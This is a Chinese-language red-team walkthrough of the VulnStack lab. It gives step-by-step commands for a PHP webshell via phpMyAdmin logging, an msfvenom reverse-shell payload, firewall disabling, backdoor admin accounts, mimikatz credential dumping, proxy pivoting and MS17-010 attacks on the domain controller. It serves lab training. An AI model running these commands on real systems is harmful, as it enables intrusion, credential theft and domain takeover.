vulnstack红队一学习
字数 1252 2025-08-06 01:23:31
VulnStack红队实战环境一渗透教学文档
环境搭建
网络配置
-
使用VMware配置虚拟网络:
- 编辑->虚拟网络编辑器
- 自定义为仅主机模式(VMnet1)
-
配置Win7网络:
- 添加两块网卡:
- 一块为VMnet1(仅主机模式)
- 一块为VMnet8(NAT模式连通外网)
- 配置VMnet1网卡:
- DNS服务器设置为Windows Server的IP
- 使用Win7 ping Windows Server验证连通性
- 添加两块网卡:
-
加入域:
- 控制面板->系统安全->系统->高级系统设置
- 加入域时使用已有域用户登录
-
确保Kali和Win7都使用VMnet8处于同一网段,均可访问外网
拿下Win7
初始访问
-
如果网站访问不了,检查防火墙设置:
- 允许Apache和MySQL程序通过防火墙
-
目录扫描发现phpMyAdmin:
- 使用弱口令(root/root)成功登录
通过phpMyAdmin获取WebShell
-
日志写入WebShell技术:
show variables like "%log%"; -- 查看日志状态 set global general_log='on'; -- 开启日志 set global general_log_file='C:\\phpStudy\\WWW\\test2.php'; -- 修改日志路径 show variables like "general_log%"; -- 查看开启情况 -- 写入WebShell select "<?php eval($_POST[123]);?>"; -
发现YXCMS 1.2.1备份文件:
- 访问后台:index.php?r=admin
- 使用凭证:admin/123456
- 在前台模板index_index.php中插入一句话木马
- 访问http://192.168.137.129/yxcms/获取WebShell
进入内网
建立持久化Shell
-
使用MSF生成木马:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=12345 -f exe -o hack.exe -
设置监听:
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 目标机IP set LPORT 12345 run -
在蚁剑中执行start hack.exe
进程迁移
-
迁移到explorer.exe:
migrate -N explorer.exe -
设置自动迁移:
set autorunscript migrate -N explorer.exe 或 set autorunscript migrate -f # 默认迁移到记事本
开启远程登录
-
关闭防火墙:
netsh firewall show state # 查看状态 netsh firewall set opmode disable # 关闭防火墙 -
开启3389端口:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f -
添加用户:
net user test 123root! /add net localgroup administrators test /add
信息收集
-
基础信息收集命令:
ipconfig /all # 查询IP和域信息 systeminfo # 查询系统信息 net config Workstation # 查询计算机和域信息 net user # 本机用户 net user /domain # 查询域用户 net view /domain:god # 查看域主机名 net user test /domain # 查询域内test用户 net user /domain test 123 # 修改test用户密码为123 net group /domain # 查询域工作组 net group "domain admins" /domain # 查询域管理员 net group "domain controllers" /domain # 查看域控制器 tasklist # 查询进程 -
域内主机存活探测:
- ICMP探测:
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL" - MSF的udp_probe模块:
use auxiliary/scanner/discovery/udp_probe set rhosts 192.168.52.0/24 set threads 5 run- 注意:DNS server一般为域控
- ICMP探测:
提权与凭证获取
使用MSF模块获取密码
-
自带模块:
post/windows/gather/smart_hashdump -
使用mimikatz:
load mimikatz mimikatz_command -f sekurlsa::searchPasswords # 获取明文密码 -
使用kiwi:
load kiwi creds_all # 获取密码 kiwi_cmd sekurlsa::logonpasswords # 使用mimikatz命令
上传mimikatz获取明文
-
上传mimikatz:
upload /path/to/mimikatz.exe C:\\phpStudy\\WWW\\yxcms -
执行mimikatz:
privilege::debug # 提升权限 sekurlsa::logonPasswords # 获取密码
横向移动
添加路由
- 在meterpreter中添加路由:
run autoroute -s 192.168.52.0/24 # 内网网段 run autoroute -p # 查看添加的路由
添加socks4代理
-
将meterpreter会话移到后台:
background 或 session 2 # 未使用的session数字 -
设置socks4代理:
use auxiliary/server/socks4a set srvhost kali的IP set srvport 1080 # 如果创建失败可能是端口占用 run -
修改/etc/proxychains.conf:
- 改为自己socks的IP和端口
攻击Win 2K3
- 使用MS17-010漏洞:
use exploit/windows/smb/ms17_010_psexec set payload windows/meterpreter/bind_tcp set rhost 192.168.52.141 run
拿下域控
使用PsExec
-
下载PsExec:
- https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec
-
在已拿下的Win7上执行:
PsExec.exe \\192.168.52.138 -u liukaifeng01 -s cmd.exe- 必须加-s以system权限执行
- 输入密码后进入交互shell
关闭域控防火墙
-
查看防火墙状态:
netsh advfirewall show allprofiles -
关闭防火墙:
netsh advfirewall set allprofiles state off
远程连接域控
-
设置远程桌面端口:
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f -
开启远程桌面:
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 -
在Windows下配置代理:
- 使用Proxifier配置代理
- 注意:输入账号时使用
GOD\liukaifeng01格式,否则会提示密码错误
使用MS17-010攻击域控
- 在关闭防火墙的情况下:
proxychains msfconsole # 使用代理启动msf use exploit/windows/smb/ms17_010_psexec set payload windows/meterpreter/bind_tcp # 不出网使用正向连接 set rhost 192.168.2.138 # 域IP run
成功获取SYSTEM权限,完成域控攻陷。